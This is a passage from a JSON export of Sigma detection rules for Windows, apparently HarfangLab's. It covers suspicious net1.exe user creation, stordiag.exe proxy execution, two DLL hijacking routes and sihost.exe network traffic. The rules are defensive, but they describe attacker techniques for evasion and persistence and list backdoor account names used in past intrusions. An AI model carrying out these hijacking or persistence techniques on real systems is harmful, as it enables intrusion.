"rule_description": "Detects suspicious execution of the legitimate Windows binary msiexec.exe.\nAdversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).\nIt is recommended to verify the legitimacy of the MSI file.\n",
"rule_creation_date": "2021-07-09",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1218.007",
"attack.t1546.016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff11817e-b808-44b5-987d-f621e52b3bef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070200Z",
"creation_date": "2026-03-23T11:45:34.070202Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070208Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1569441172061585409",
"https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf",
"https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta",
"https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ",
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://attack.mitre.org/techniques/T1078",
"https://attack.mitre.org/techniques/T1098",
"https://attack.mitre.org/techniques/T1136/"
],
"name": "t1078_suspicious_user_creation_through_net.yml",
"content": "title: Suspicious User Created via net.exe\nid: ff11817e-b808-44b5-987d-f621e52b3bef\ndescription: |\n Detects the execution of net1.exe in order to create suspicious users.\n This is often used by attackers to evade defense and keep persistence.\n This rule detects usernames that have already been used by attackers in the past.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://twitter.com/malmoeb/status/1569441172061585409\n - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf\n - https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta\n - https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://attack.mitre.org/techniques/T1078\n - https://attack.mitre.org/techniques/T1098\n - https://attack.mitre.org/techniques/T1136/\ndate: 2022/09/28\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1078\n - attack.t1098\n - attack.persistence\n - attack.t1136\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n selection_user:\n CommandLine|contains: ' user'\n selection_add:\n CommandLine|contains:\n - '/add'\n - '\\add'\n - '-add'\n selection_suspicious_user:\n CommandLine|contains:\n - ' z '\n - ' zz '\n - ' Mysql '\n - ' DefaultAccount '\n - ' DefaultAccount? 
'\n - ' admina '\n - ' Crackenn '\n - ' krtbgt '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff11817e-b808-44b5-987d-f621e52b3bef",
"rule_name": "Suspicious User Created via net.exe",
"rule_description": "Detects the execution of net1.exe in order to create suspicious users.\nThis is often used by attackers to evade defenses and maintain persistence.\nThis rule detects usernames that have already been used by attackers in the past.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-09-28",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1098",
"attack.t1136"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff2d57de-576b-48a9-b92d-aee4a563ffe6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069468Z",
"creation_date": "2026-03-23T11:45:34.069470Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069475Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Stordiag/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1218_stordiag.yml",
"content": "title: Proxy Execution via stordiag.exe\nid: ff2d57de-576b-48a9-b92d-aee4a563ffe6\ndescription: |\n Detects a suspicious execution of the Storage Diagnostic Tool (Stordiag.exe) to execute another binary.\n Stordiag.exe executes different programs to perform its diagnostics (systeminfo.exe, fltMC.exe, schtasks.exe,...) but prioritizes executables in its working directories.\n Attackers can proxy the execution of malicious payloads using the stordiag binary to evade detection.\n It is recommended to analyze the process responsible for the execution of stordiag as well as to analyze all child processes for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Stordiag/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2022/02/07\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1574.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Stordiag\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # The following binaries can be spawned by stordiag.exe:\n # - systeminfo.exe\n # - fltMC.exe\n # - schtasks.exe\n # - LogMan.exe # with -collectetw\n # - fsutil.exe # with -checkfsconsistency\n # - cmd.exe # with -checkfsconsistency\n # - CHKDSK.exe # with -checkfsconsistency\n selection:\n - Image|endswith: '\\stordiag.exe'\n - OriginalFileName: 'stordiag.exe'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff2d57de-576b-48a9-b92d-aee4a563ffe6",
"rule_name": "Proxy Execution via stordiag.exe",
"rule_description": "Detects a suspicious execution of the Storage Diagnostic Tool (Stordiag.exe) to execute another binary.\nStordiag.exe executes different programs to perform its diagnostics (systeminfo.exe, fltMC.exe, schtasks.exe,...) but prioritizes executables in its working directories.\nAttackers can proxy the execution of malicious payloads using the stordiag binary to evade detection.\nIt is recommended to analyze the process responsible for the execution of stordiag as well as to analyze all child processes for malicious content or actions.\n",
"rule_creation_date": "2022-02-07",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff540b1f-d494-44b7-9446-7c0443c34d87",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084409Z",
"creation_date": "2026-03-23T11:45:34.084411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084416Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_useraccountcontrolsettings.yml",
"content": "title: DLL Hijacking via useraccountcontrolsettings.exe\nid: ff540b1f-d494-44b7-9446-7c0443c34d87\ndescription: |\n Detects potential Windows DLL Hijacking via useraccountcontrolsettings.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'useraccountcontrolsettings.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff540b1f-d494-44b7-9446-7c0443c34d87",
"rule_name": "DLL Hijacking via useraccountcontrolsettings.exe",
"rule_description": "Detects potential Windows DLL Hijacking via useraccountcontrolsettings.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ff8c5702-d6ec-4d57-a6dc-8b3aa2a9d9d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094799Z",
"creation_date": "2026-03-23T11:45:34.094801Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/0gtweet/status/1827991604918890968",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_sideloading_licensing_diag.yml",
"content": "title: Possible LicensingDiag DLL Hijacking via Registry\nid: ff8c5702-d6ec-4d57-a6dc-8b3aa2a9d9d2\ndescription: |\n Detects LicensingDiag registry key being set.\n Adversaries can register different paths to this key for DLLs that will automatically get loaded when LicensingDiag.exe is launched.\n It is recommended to investigate the DLLs in the paths listed in this key. Specifically the exported InitializeCollector() function which will be called by LicensingDiag.\nreferences:\n - https://x.com/0gtweet/status/1827991604918890968\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/08/26\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LicensingDiag\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ff8c5702-d6ec-4d57-a6dc-8b3aa2a9d9d2",
"rule_name": "Possible LicensingDiag DLL Hijacking via Registry",
"rule_description": "Detects LicensingDiag registry key being set.\nAdversaries can register different paths to this key for DLLs that will automatically get loaded when LicensingDiag.exe is launched.\nIt is recommended to investigate the DLLs in the paths listed in this key. Specifically the exported InitializeCollector() function which will be called by LicensingDiag.\n",
"rule_creation_date": "2024-08-26",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fff7590e-c14f-4958-bc97-138b82e6b832",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074062Z",
"creation_date": "2026-03-23T11:45:34.074065Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074070Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://live.paloaltonetworks.com/t5/blogs/diplomats-beware-cloaked-ursa-phishing-with-a-twist/ba-p/549960",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_sihost_suspicious_network_communication.yml",
"content": "title: Suspicious sihost.exe Network Communication\nid: fff7590e-c14f-4958-bc97-138b82e6b832\ndescription: |\n Detects network communications from sihost.exe.\n This can be the result of a communication with a C&C server after an adversary injects malicious code inside a legitimate process in order to evade process-based defenses.\n It is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://live.paloaltonetworks.com/t5/blogs/diplomats-beware-cloaked-ursa-phishing-with-a-twist/ba-p/549960\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2023/10/03\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.command_and_control\n - attack.t1571\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'sihost.exe'\n\n filter_dstport:\n DestinationPort: '135'\n\n filter_linklocal_ipv6:\n SourceIp: 'fe80::*'\n DestinationIp: 'fe80::*'\n\n filter_linklocal_ipv4:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - '100.64.0.0/10' # RFC6598\n\n exclusion_copytrans:\n # api.copytrans.net\n DestinationIp:\n - '52.47.178.141'\n - '54.149.145.98'\n DestinationPort: '443'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fff7590e-c14f-4958-bc97-138b82e6b832",
"rule_name": "Suspicious sihost.exe Network Communication",
"rule_description": "Detects network communications from sihost.exe.\nThis can be the result of a communication with a C&C server after an adversary injects malicious code inside a legitimate process in order to evade process-based defenses.\nIt is recommended to investigate the parent process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2023-10-03",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}